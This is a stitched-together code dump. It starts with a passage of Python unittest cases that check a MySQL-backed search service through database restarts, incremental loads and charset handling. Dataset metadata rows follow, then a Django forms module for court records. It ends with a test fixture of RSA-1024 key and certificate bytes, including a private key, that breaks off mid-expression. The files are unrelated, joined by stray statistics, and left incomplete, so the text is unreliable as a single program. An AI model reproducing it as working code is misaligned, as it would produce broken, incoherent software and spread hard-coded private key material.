self.assertEqual(len(results), 1)
documents = results[0]
count = 2
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.000001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_mysql_restart_with_full_mode(self):
# send data
ret = self.mysql_client.execute_batch_sql('data/test_mysql_restart_with_full_mode_full.sql')
self.assertEqual(ret, 0)
# create collection
collection_name = 'test_mysql_restart_with_full_mode'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
# # suspend collection
# status = self.client.suspend_collection(collection_name)
# logging.info("suspend collection result: %s", data)
# self.assertEqual(status.code, 0)
# time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
# stop mysql
self.server_utils.stop_mysql()
time.sleep(2)
# start mysql
self.server_utils.start_mysql()
time.sleep(2)
# # resume collection
# status = self.client.resume_collection(collection_name)
# logging.info("resume collection result: %s", data)
# self.assertEqual(status.code, 0)
time.sleep(10)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 300
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_mysql_restart_with_inc_mode(self):
# send full data
ret = self.mysql_client.execute_batch_sql('data/test_mysql_restart_with_inc_mode_full.sql')
self.assertEqual(ret, 0)
# create collection
collection_name = 'test_mysql_restart_with_inc_mode'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 100
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# send inc1 data
ret = self.mysql_client.execute_batch_sql('data/test_mysql_restart_with_inc_mode_inc_1.sql')
self.assertEqual(ret, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 200
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# stop mysql
self.server_utils.stop_mysql()
time.sleep(2)
# start mysql
self.server_utils.start_mysql()
time.sleep(2)
# send inc2 data
ret = self.mysql_client.execute_batch_sql('data/test_mysql_restart_with_inc_mode_inc_2.sql')
self.assertEqual(ret, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 300
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_mysql_restart_with_create_collection(self):
# send full data
ret = self.mysql_client.execute_batch_sql('data/test_mysql_restart_with_create_collection_full.sql')
self.assertEqual(ret, 0)
# stop mysql
self.server_utils.stop_mysql()
time.sleep(2)
# create collection
collection_name = 'test_mysql_restart_with_create_collection'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 0
self.assertEqual(len(documents), count)
# start mysql
self.server_utils.start_mysql()
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 100
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_multi_collections(self):
# create collection
collections = []
collection_count = 5
repository_table = 'test_multi_collections'
for i in range(0, collection_count):
collection = 'test_multi_collections_' + str(i)
collections.append(collection)
schema = self.create_schema(collection,
repository_table=repository_table,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
# send full data
ret = self.mysql_client.execute_batch_sql('data/test_multi_collections_full.sql')
self.assertEqual(ret, 0)
time.sleep(10)
# query result
topk = 300
for i in range(0, collection_count):
collection = 'test_multi_collections_' + str(i)
status, response = self.query(collection, topk=topk)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 100
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.000001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# send inc data
ret = self.mysql_client.execute_batch_sql('data/test_multi_collections_inc.sql')
self.assertEqual(ret, 0)
time.sleep(10)
# query result
topk = 300
for i in range(0, collection_count):
collection = 'test_multi_collections_' + str(i)
status, response = self.query(collection, topk=topk)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 300
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# def test_suspend_and_resume_collection(self):
# # create collection
# collection_name = 'test_mysql_restart_with_full_mode'
# schema = self.create_schema(collection_name,
# repository_table=collection_name,
# index_columns=["column1"],
# index_dimensions=[16])
# status = self.client.create_collection(schema)
# self.assertEqual(status.code, 0)
# # suspend collection
# status = self.client.suspend_collection(collection_name)
# logging.info("suspend collection result: %s", data)
# self.assertEqual(status.code, 0)
# # send data
# ret = self.mysql_client.execute_batch_sql('data/test_suspend_and_resume_collection_full.sql')
# self.assertEqual(ret, 0)
# time.sleep(2)
# # query result
# status, response = self.query(collection_name)
# self.assertTrue(status.ok())
# logging.info("query result: %s", response)
# results = response.results
# self.assertEqual(len(results), 1)
# documents = results[0]
# self.assertEqual(len(documents), 0)
# # resume collection
# status = self.client.resume_collection(collection_name)
# logging.info("resume collection result: %s", data)
# self.assertEqual(status.code, 0)
# time.sleep(10)
# # query result
# query = self.create_query(collection_name, 300)
# status, response = self.query(collection_name)
# self.assertTrue(status.ok())
# logging.info("query result: %s", response)
# results = response.results
# self.assertEqual(len(results), 1)
# documents = results[0]
# count = 300
# self.assertEqual(len(documents), count)
# for i in range(0, count):
# self.assertEqual(documents[i].primary_key, i + 1)
# self.assertEqual(documents[i].score, i * i)
# self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
# 11.111 + i, delta=0.001)
# self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_invalid_lsn_info(self):
# send data
ret = self.mysql_client.execute_batch_sql('data/test_invalid_lsn_info_full.sql')
self.assertEqual(ret, 0)
time.sleep(5)
# create collection
collection_name = 'test_invalid_lsn_info'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 100
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# get latest lsn
latest_lsn = self.get_latest_lsn(collection_name)
self.assertEqual(latest_lsn.lsn, 100)
file_name = latest_lsn.context.split(';')[0]
# stop mysql repository
self.server_utils.stop_mysql_repo()
# mysql flush logs
ret = self.mysql_client.execute("flush logs;flush logs; flush logs;")
self.assertEqual(ret, 0)
# purge binlog
ret = self.mysql_client.purge_binlog(file_name)
self.assertEqual(ret, 0)
# start mysql repository
self.server_utils.start_mysql_repo()
# send data
ret = self.mysql_client.execute_batch_sql('data/test_invalid_lsn_info_inc.sql')
self.assertEqual(ret, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name, topk=300)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 300
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
def test_forward_with_charset_utf8(self):
collection_name = 'test_forward_with_charset_utf8'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_charset_utf8_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('第一个字段'))
self.assertEqual(documents[i].forward_column_values['f2'], ('定长字段'))
self.assertEqual(documents[i].forward_column_values['f3'], ('我是谁'))
self.assertEqual(documents[i].forward_column_values['f4'], ('第三个字段'))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_charset_utf8_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('第一个字段'))
self.assertEqual(documents[i].forward_column_values['f2'], ('定长字段'))
self.assertEqual(documents[i].forward_column_values['f3'], ('我是谁'))
self.assertEqual(documents[i].forward_column_values['f4'], ('第三个字段'))
def test_forward_with_charset_gbk(self):
collection_name = 'test_forward_with_charset_gbk'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_charset_gbk_full.sql')
self.assertEqual(ret, 0)
# create collection
forward_columns=['f1', 'f2', 'f3', 'f4']
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
forward_columns=forward_columns,
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('第一个字段'))
self.assertEqual(documents[i].forward_column_values['f2'], ('定长字段'))
self.assertEqual(documents[i].forward_column_values['f3'], ('我是谁'))
self.assertEqual(documents[i].forward_column_values['f4'], ('第三个字段'))
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_forward_with_charset_gbk_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], ('第一个字段'))
self.assertEqual(documents[i].forward_column_values['f2'], ('定长字段'))
self.assertEqual(documents[i].forward_column_values['f3'], ('我是谁'))
self.assertEqual(documents[i].forward_column_values['f4'], ('第三个字段'))
def test_one_field_both_index_and_forward(self):
collection_name = 'test_one_field_both_index_and_forward'
# prepare full table data
ret = self.mysql_client.execute_batch_sql('data/test_one_field_both_index_and_forward_full.sql')
self.assertEqual(ret, 0)
# create collection
schema = self.create_schema(collection_name,
repository_table=collection_name,
forward_columns=["f1", "column1"],
index_columns=["column1", "column2"],
index_dimensions=[16, 16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 4
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
self.assertEqual(documents[i].forward_column_values['column1'], '[1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,' + str(i + 1) + ']')
# prepare increment table data
ret = self.mysql_client.execute_batch_sql('data/test_one_field_both_index_and_forward_inc.sql')
self.assertEqual(ret, 0)
time.sleep(6)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
total = 6
self.assertEqual(len(documents), total)
for i in range(0, total):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
self.assertEqual(documents[i].forward_column_values['column1'], '[1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,' + str(i + 1) + ']')
# Run the whole suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
| 40.086937
| 123
| 0.650225
| 11,132
| 88,071
| 4.964068
| 0.030632
| 0.154452
| 0.135505
| 0.135722
| 0.94202
| 0.931071
| 0.913916
| 0.903493
| 0.899005
| 0.890138
| 0
| 0.032947
| 0.220095
| 88,071
| 2,196
| 124
| 40.105191
| 0.771573
| 0.111444
| 0
| 0.834706
| 0
| 0.001267
| 0.085678
| 0.048634
| 0
| 0
| 0
| 0
| 0.395187
| 1
| 0.025332
| false
| 0
| 0.008233
| 0.000633
| 0.037365
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3f61948e2cd9e7d8b651e8a7e9f4cf6f997b88b
| 2,980
|
py
|
Python
|
apps/Courts/forms.py
|
steve-njuguna-k/Kenya-ePolice
|
561c33de242acf7f1d02af6395913a4a389b427f
|
[
"MIT"
] | 1
|
2022-02-26T20:15:33.000Z
|
2022-02-26T20:15:33.000Z
|
apps/Courts/forms.py
|
steve-njuguna-k/Kenya-ePolice
|
561c33de242acf7f1d02af6395913a4a389b427f
|
[
"MIT"
] | null | null | null |
apps/Courts/forms.py
|
steve-njuguna-k/Kenya-ePolice
|
561c33de242acf7f1d02af6395913a4a389b427f
|
[
"MIT"
] | null | null | null |
from django import forms
from apps.Accused.models import AccusedPerson
from apps.Courts.models import COURTS, VERDICT, Court
class AddCourtInfoForm(forms.Form):
    """Form for recording a new court appearance for an accused person.

    The ``accused_person`` choices are rebuilt from the database on every
    instantiation so newly registered people appear without a restart.
    """
    court_number = forms.CharField(max_length=50, required=True, widget=forms.TextInput(attrs={'id': 'court_number', 'class': 'form-control mb-4', 'name': 'court_number', 'placeholder': 'Court Number'}))
    accused_person = forms.ChoiceField(required=True, widget=forms.Select(attrs={'id': 'accused_person', 'class': 'form-control mb-4', 'name': 'accused_person', 'placeholder': 'Accused Person'}))
    court = forms.ChoiceField(choices=COURTS, required=True, widget=forms.Select(attrs={'id': 'court', 'class': 'form-control mb-4', 'name': 'court', 'placeholder': 'Court'}))
    court_verdict = forms.ChoiceField(choices=VERDICT, required=True, widget=forms.Select(attrs={'id': 'court_verdict', 'class': 'form-control mb-4', 'name': 'court_verdict', 'placeholder': 'Verdict'}))
    scheduled_on = forms.DateField(required=True, widget=forms.DateInput(attrs={'type': 'date', 'id': 'scheduled_on', 'class': 'form-control mb-4', 'name': 'scheduled_on', 'placeholder': 'Scheduled On'}))

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Label each choice with the person's full name; a single f-string
        # replaces the previous concatenated f-string fragments.
        self.fields['accused_person'].choices = [
            (e.pk, f"{e.first_name} {e.middle_name} {e.last_name}")
            for e in AccusedPerson.objects.all()
        ]

    # NOTE(review): plain forms.Form ignores Meta entirely; it is kept only
    # to document the intended model/fields. Switch to forms.ModelForm if
    # model binding is actually wanted.
    class Meta:
        model = Court
        fields = ['court_number', 'accused_person', 'court', 'court_verdict', 'scheduled_on']
class EditCourtInfoForm(forms.Form):
    """Form for editing an existing court appearance record.

    The ``accused_person`` choices are rebuilt from the database on every
    instantiation so newly registered people appear without a restart.
    """
    court_number = forms.CharField(max_length=50, required=True, widget=forms.TextInput(attrs={'id': 'court_number', 'class': 'form-control mb-4', 'name': 'court_number', 'placeholder': 'Court Number'}))
    accused_person = forms.ChoiceField(required=True, widget=forms.Select(attrs={'id': 'accused_person', 'class': 'form-control mb-4', 'name': 'accused_person', 'placeholder': 'Accused Person'}))
    court = forms.ChoiceField(choices=COURTS, required=True, widget=forms.Select(attrs={'id': 'court', 'class': 'form-control mb-4', 'name': 'court', 'placeholder': 'Court'}))
    court_verdict = forms.ChoiceField(choices=VERDICT, required=True, widget=forms.Select(attrs={'id': 'court_verdict', 'class': 'form-control mb-4', 'name': 'court_verdict', 'placeholder': 'Verdict'}))
    scheduled_on = forms.DateField(required=True, widget=forms.DateInput(attrs={'type': 'date', 'id': 'scheduled_on', 'class': 'form-control mb-4', 'name': 'scheduled_on', 'placeholder': 'Scheduled On'}))

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Label each choice with the person's full name; a single f-string
        # replaces the previous concatenated f-string fragments.
        self.fields['accused_person'].choices = [
            (e.pk, f"{e.first_name} {e.middle_name} {e.last_name}")
            for e in AccusedPerson.objects.all()
        ]

    # NOTE(review): plain forms.Form ignores Meta entirely; it is kept only
    # to document the intended model/fields. Switch to forms.ModelForm if
    # model binding is actually wanted.
    class Meta:
        model = Court
        fields = ['court_number', 'accused_person', 'court', 'court_verdict', 'scheduled_on']
| 90.30303
| 204
| 0.688255
| 374
| 2,980
| 5.328877
| 0.160428
| 0.078274
| 0.090316
| 0.115404
| 0.909182
| 0.909182
| 0.909182
| 0.909182
| 0.909182
| 0.909182
| 0
| 0.005337
| 0.119799
| 2,980
| 33
| 205
| 90.30303
| 0.75448
| 0
| 0
| 0.740741
| 0
| 0
| 0.321369
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.111111
| 0
| 0.703704
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
616d78103599bdc7510e1cda3bffce6bd889320b
| 5,608
|
py
|
Python
|
tests/expected/RSA1024.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 92
|
2016-10-03T07:54:39.000Z
|
2022-03-29T00:38:45.000Z
|
tests/expected/RSA1024.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 46
|
2016-09-09T03:13:40.000Z
|
2022-03-10T22:54:12.000Z
|
tests/expected/RSA1024.py
|
castrapel/pyjks
|
f32dd209437f748949053be70f57ab1e80b5a7e3
|
[
"MIT"
] | 30
|
2016-10-07T16:12:11.000Z
|
2022-02-04T21:34:03.000Z
|
# Test fixture: expected RSA-1024 public key bytes for the key-store tests
# (presumably DER-encoded SubjectPublicKeyInfo -- confirm against the test
# that consumes this constant).
public_key = b"\x30\x81\x9f\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x81\x8d\x00\x30\x81\x89\x02\x81\x81\x00\xc4\x78\x0b" + \
             b"\xdf\xf0\xc6\x38\x3d\xb7\x52\x66\x28\x48\xdc\x0f\x5a\x68\xe9\x79\x95\xb9\xcc\x59\xfc\x49\x6b\x0b\x1d\x3c\x29\x8f\x72\x1e\x89\x5e" + \
             b"\x27\x9a\xe8\x2a\x83\x4f\x80\x87\xbb\xf6\x63\x2d\xdd\x0f\x57\xb5\x59\xbb\x81\xe7\xc5\x3d\x7b\xa1\x73\x64\xb1\xfe\xb8\xc7\xae\x4e" + \
             b"\xc3\xdb\x91\xc4\x60\xad\x10\xe6\xe5\x7f\xdf\x79\xad\xb6\x86\x77\x0e\xb7\x89\x92\xef\x93\x72\xb7\xe3\xaa\x70\x3b\xf7\x8e\xc5\x43" + \
             b"\x82\x1f\x0d\x55\x39\xb9\xfb\x46\xf5\xcc\xdd\x45\xb5\x08\x34\x38\xdb\x87\x8e\x3e\xda\x33\x75\x94\x9e\x30\xde\x00\x47\x02\x03\x01" + \
             b"\x00\x01"
# Test fixture: expected RSA-1024 private key bytes (presumably a
# DER-encoded PKCS#8 PrivateKeyInfo -- confirm against the consuming test).
private_key = b"\x30\x82\x02\x76\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x04\x82\x02\x60\x30\x82\x02\x5c\x02\x01" + \
              b"\x00\x02\x81\x81\x00\xc4\x78\x0b\xdf\xf0\xc6\x38\x3d\xb7\x52\x66\x28\x48\xdc\x0f\x5a\x68\xe9\x79\x95\xb9\xcc\x59\xfc\x49\x6b\x0b" + \
              b"\x1d\x3c\x29\x8f\x72\x1e\x89\x5e\x27\x9a\xe8\x2a\x83\x4f\x80\x87\xbb\xf6\x63\x2d\xdd\x0f\x57\xb5\x59\xbb\x81\xe7\xc5\x3d\x7b\xa1" + \
              b"\x73\x64\xb1\xfe\xb8\xc7\xae\x4e\xc3\xdb\x91\xc4\x60\xad\x10\xe6\xe5\x7f\xdf\x79\xad\xb6\x86\x77\x0e\xb7\x89\x92\xef\x93\x72\xb7" + \
              b"\xe3\xaa\x70\x3b\xf7\x8e\xc5\x43\x82\x1f\x0d\x55\x39\xb9\xfb\x46\xf5\xcc\xdd\x45\xb5\x08\x34\x38\xdb\x87\x8e\x3e\xda\x33\x75\x94" + \
              b"\x9e\x30\xde\x00\x47\x02\x03\x01\x00\x01\x02\x81\x80\x01\x67\xee\x85\xd2\xbe\x48\x66\xc0\xaa\x19\x4b\x0e\x82\x6c\xa5\xb3\xfc\x7f" + \
              b"\xbf\x3f\x8e\x23\xd2\xb7\x5f\xc9\xbb\x92\xd3\xa5\x50\x26\xc1\xca\xe7\xb3\xa7\x17\xae\xca\xe1\xdb\x96\xcf\xc3\x93\xef\x72\x0d\xa9" + \
              b"\xa1\x93\xc2\xf1\x3a\xab\x1e\xf8\x5f\xd0\x07\xaa\x0f\xfb\x40\x13\xe8\x0a\x84\xc3\x33\x0e\xad\x8a\x22\xf0\x2b\xed\x35\x30\x02\x59" + \
              b"\x17\x2a\xc7\xe5\x68\x58\xb0\x6d\x8f\x69\x19\x81\x69\xff\x67\x1e\x85\xe2\x35\x89\xd8\xc7\x53\xc5\xa4\x57\x1a\x80\x4b\xa4\xa3\xa7" + \
              b"\x21\x59\x49\x0f\xf1\x42\x50\xac\x35\x7c\x63\xfd\x31\x02\x41\x00\xe2\x3a\xed\x49\xd8\x99\x4b\xf9\x9b\xc5\x24\x61\xa7\x6c\xff\xd5" + \
              b"\xd9\xf5\xd8\x66\xec\xce\xda\x52\xa4\x63\x63\x35\xd4\x52\xc3\x8e\xaf\xd4\x60\x2c\x04\x7b\xba\xb9\x9e\x5d\x7e\x58\x47\xad\x33\xb2" + \
              b"\xe9\x5f\xc1\xe4\xeb\x9b\x79\x88\x72\x1c\x82\x1d\xa4\xe7\x73\x09\x02\x41\x00\xde\x52\x8b\x71\x0b\xcf\xaf\xa1\x8a\x25\xa6\xf6\x4d" + \
              b"\xe0\x87\x6d\x4d\xce\xca\x96\x65\x2b\x0f\xd0\xbc\x6b\x71\x26\xa7\x37\xef\xac\xa7\xbf\x41\xc3\xf6\xdb\xce\xba\x6b\x02\x3c\x45\xc7" + \
              b"\x52\x3d\x98\xce\xf9\xb5\x30\x3d\xd6\xce\xf8\x18\xb8\x4f\x01\x09\xcb\x1c\xcf\x02\x40\x31\x7d\x94\xa5\x80\x05\xe1\x32\x04\xda\xb6" + \
              b"\xdf\xca\x21\xb5\x42\x12\x41\x8f\x0a\xcd\x29\x5f\x67\x8e\xe0\xd3\x36\x56\x71\x98\xa8\x61\x5c\xc3\x81\x3d\xa5\xd7\xae\x7d\xaf\x94" + \
              b"\x51\x39\xb4\xf1\x47\x65\x78\x76\x51\x5f\x1d\x8f\x13\xc3\x6a\xeb\x28\x13\x08\x33\x09\x02\x40\x4d\xff\xe5\xde\x3e\x87\x9a\x15\xf1" + \
              b"\xd2\xed\xf6\x02\x32\xa1\x30\xef\x18\x7b\x29\x32\xcb\x5d\xdc\x1d\x0f\x10\xfe\xbf\xb2\x37\x4b\x7a\xfa\xf6\x06\xdb\xc8\x18\x8a\x7c" + \
              b"\xda\xa6\xec\xd0\x56\x81\x37\xe8\x7d\xe1\x5c\xd0\x85\x59\xcd\xdf\x56\x62\x99\x79\xa7\x22\x2f\x02\x41\x00\xcc\x59\xe0\x6e\x40\xba" + \
              b"\x16\xdc\x4c\x81\xeb\x84\x1c\x2a\x84\xee\x10\xd9\xa5\x93\x28\xe2\x04\x30\x9d\xfa\x0b\x19\xbf\x37\xc4\xb1\x84\x73\x49\xb1\x84\xac" + \
              b"\x27\xd3\x81\xc3\x0d\x44\xdd\x0e\x50\x68\x06\xc1\xaf\x80\x71\x7a\x36\x6e\x0a\xf1\x7c\xd9\xdd\x31\x74\xed"
# Test fixture: expected certificate chain as a list of byte strings
# (presumably a single self-signed DER X.509 certificate for CN "RSA1024"
# -- confirm against the consuming test).
certs = [b"\x30\x82\x01\x98\x30\x82\x01\x01\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x30" + \
         b"\x12\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x31\x30\x32\x34\x30\x1e\x17\x0d\x31\x36\x30\x35\x31\x35\x31\x38\x35" + \
         b"\x31\x30\x31\x5a\x17\x0d\x31\x38\x30\x35\x31\x35\x31\x38\x35\x31\x30\x31\x5a\x30\x12\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07" + \
         b"\x52\x53\x41\x31\x30\x32\x34\x30\x81\x9f\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x81\x8d\x00\x30\x81\x89" + \
         b"\x02\x81\x81\x00\xc4\x78\x0b\xdf\xf0\xc6\x38\x3d\xb7\x52\x66\x28\x48\xdc\x0f\x5a\x68\xe9\x79\x95\xb9\xcc\x59\xfc\x49\x6b\x0b\x1d" + \
         b"\x3c\x29\x8f\x72\x1e\x89\x5e\x27\x9a\xe8\x2a\x83\x4f\x80\x87\xbb\xf6\x63\x2d\xdd\x0f\x57\xb5\x59\xbb\x81\xe7\xc5\x3d\x7b\xa1\x73" + \
         b"\x64\xb1\xfe\xb8\xc7\xae\x4e\xc3\xdb\x91\xc4\x60\xad\x10\xe6\xe5\x7f\xdf\x79\xad\xb6\x86\x77\x0e\xb7\x89\x92\xef\x93\x72\xb7\xe3" + \
